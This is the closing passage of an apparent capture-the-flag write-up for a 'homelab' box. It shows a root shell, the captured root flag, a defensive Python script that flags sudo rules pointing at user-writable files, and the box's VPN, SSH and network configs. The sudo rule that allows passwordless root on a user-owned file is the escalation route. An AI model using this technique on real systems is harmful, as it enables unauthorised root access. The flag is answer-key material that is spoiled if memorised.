[+] Logging to /home/Pepster/.penelope/homelab.hmv~192.168.60.202_Linux_x86_64/2025_05_29-09_53_51-597.log 📜
──────────────────────────────────────────────────────────────────────────
/home/shinosawa # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/home/shinosawa # cat /root/root.flag
flag{e3b081b8af1c7079049b029c7cb8bd0d}
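The root step above works because the sudo rule points at a file the invoking user owns. The following audit, an added example that is not code from the original post or the box, parses sudoers-style rules and flags commands that live in a directory the rule's user can write (their home, /tmp and similar), with or without NOPASSWD; `SAMPLE_SUDOERS` is constructed, and its first rule mirrors the one shown by sudo -l on the page.

```python
import re

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"      # NOPASSWD:, NOEXEC:, SETENV: ...
    r"(?P<cmds>.+)$"
)
SHARED_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample: the first rule is the one granted to shinosawa on the box.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
shinosawa ALL=(ALL) NOPASSWD: /home/shinosawa/deepseek
alice ALL=(root) /usr/bin/systemctl restart nginx, /tmp/backup.sh
%admin ALL=(ALL) ALL
"""


def user_writable_prefixes(user):
    """Directories the rule's user can normally write; groups/aliases get only the shared ones."""
    prefixes = list(SHARED_WRITABLE)
    if not user.startswith(("%", "+")) and user != "ALL":
        prefixes.append(f"/home/{user}/")
    return tuple(prefixes)


def audit_sudoers(text):
    """Return [(user, command, reason), ...] for rules a reviewer should look at."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue  # option lines (including Defaults!/path ...) are not rules
        m = RULE_RE.match(line)
        if not m:
            continue
        user, tags = m["user"], m["tags"]
        writable = user_writable_prefixes(user)
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            path = cmd.split()[0]
            if path == "ALL":
                findings.append((user, cmd, "any command"))
            elif not path.startswith("/"):
                findings.append((user, cmd, "relative command path"))
            elif path.startswith(writable):
                reason = "command in a directory the user can write; replacing the file gives root"
                if "NOPASSWD" in tags:
                    reason += " without a password"
                findings.append((user, cmd, reason))
    return findings
```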

Postscript

Relevant configuration: a virtual interface vth0 was created

and assigned 10.176.13.37, and the SSH configuration listens only on 10.176.13.37.

homelab:~$ cat /etc/openvpn/openvpn.conf
port 1194
proto udp
dev tun
ca /etc/openvpn/pki/ca.crt
cert /etc/openvpn/pki/server.crt
key /etc/openvpn/pki/server.key
dh /etc/openvpn/pki/dh.pem
server 10.8.0.0 255.255.255.0
push "route 10.176.13.0 255.255.255.0"
push "dhcp-option DNS 8.8.8.8"
keepalive 10 120
cipher AES-256-GCM
user nobody
group nobody
persist-key
persist-tun
status /var/log/openvpn-status.log
log-append /var/log/openvpn.log
verb 3
topology subnet
homelab:~$ cat /etc/ssh/sshd_config|grep -v "#"|grep " "
Include /etc/ssh/sshd_config.d/*.conf
ListenAddress 10.176.13.37
PermitRootLogin yes
AllowTcpForwarding no
GatewayPorts no
X11Forwarding no
homelab:~$ cat /etc/network/interfaces
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp

auto vth0
iface vth0 inet static
address 10.176.13.37
netmask 255.255.255.0
pre-up ip link add vth0 type dummy
post-down ip link delete vth0